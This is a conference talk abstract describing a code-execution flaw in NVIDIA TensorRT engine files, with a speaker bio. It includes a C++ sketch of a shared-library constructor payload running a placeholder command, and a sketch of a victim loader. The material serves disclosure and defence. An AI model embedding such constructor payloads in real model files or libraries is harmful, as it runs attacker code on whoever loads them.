28KB to Root: Weaponizing NVIDIA's AI Model Files for Native RCE
Arun Krishnan
Security Researcher @ Scapia

Talk Abstract
NVIDIA TensorRT is the go-to inference runtime for production AI: if a model is running fast on a GPU somewhere, TensorRT is probably involved. It compiles neural networks into optimized `.engine` files that get passed around like any other model artifact: uploaded to HuggingFace, shared between teams, pulled into deployment pipelines. Nobody thinks twice about loading one.
They should.
TensorRT engine files embed real shared libraries. When you call `deserializeCudaEngine()`, NVIDIA's runtime extracts them to `/tmp` and blindly calls `dlopen()`, running whatever constructor code is inside. That's it. That's the bug.
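To see why a blind `dlopen()` is already game over, here is a minimal sketch of the kind of constructor payload an attacker could embed. The file name and the command it runs are placeholders, not the actual exploit from the talk:

```cpp
// payload.cpp -- stand-in for a shared library smuggled inside an engine file.
// Nothing TensorRT-specific here: any library with a constructor runs code
// the moment dlopen() maps it, before the caller resolves a single symbol.
#include <cstdlib>

__attribute__((constructor))
static void on_load() {
    // Runs with the full privileges of whatever process loaded the engine.
    std::system("id > /tmp/owned");  // placeholder for an attacker payload
}

// Build: g++ -shared -fPIC payload.cpp -o payload.so
```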
The only documented safety flag, `engine_host_code_allowed=False`, does nothing to stop this: it guards a different code path entirely. A 28KB engine file is all it takes to get a shell, and it works on the latest TensorRT release.
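For context, a typical victim looks something like the sketch below (assuming the standard TensorRT C++ API; `setEngineHostCodeAllowed` is the C++ counterpart of the Python `engine_host_code_allowed` property, and `model.engine` is a placeholder path):

```cpp
#include <NvInfer.h>
#include <fstream>
#include <iterator>
#include <vector>

// Minimal logger required by the TensorRT runtime.
struct Logger : nvinfer1::ILogger {
    void log(Severity, const char*) noexcept override {}
};

int main() {
    std::ifstream f("model.engine", std::ios::binary);
    std::vector<char> blob((std::istreambuf_iterator<char>(f)),
                           std::istreambuf_iterator<char>());

    Logger logger;
    auto* runtime = nvinfer1::createInferRuntime(logger);
    runtime->setEngineHostCodeAllowed(false);  // the documented "safety" switch

    // Per the talk's finding: if the blob embeds a shared library, it is
    // extracted to /tmp and dlopen()'d here, regardless of the flag above.
    auto* engine = runtime->deserializeCudaEngine(blob.data(), blob.size());
    return engine ? 0 : 1;
}
```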
This talk walks through the full attack chain, from crafting the malicious engine to popping a shell in the victim process, then pulls back to the bigger picture: TensorRT isn't alone. PyTorch, ONNX, Keras: AI model files across the board carry executable code that no one is treating as a threat. We'll cover how to detect it, how to defend against it, and what vendors need to fix.
If your team downloads AI models from anywhere and loads them, this talk is for you.

About the Speaker

Arun Krishnan
Security Researcher @ Scapia
Arun Krishnan is a fourth-year B.Tech student at Amrita Vishwa Vidyapeetham. He has been playing CTFs with Team bi0s for the past 4 years. His interests lie in web and AI security research. He has discovered dozens of zero-day vulnerabilities across major open-source software and has 4 CVEs to his name.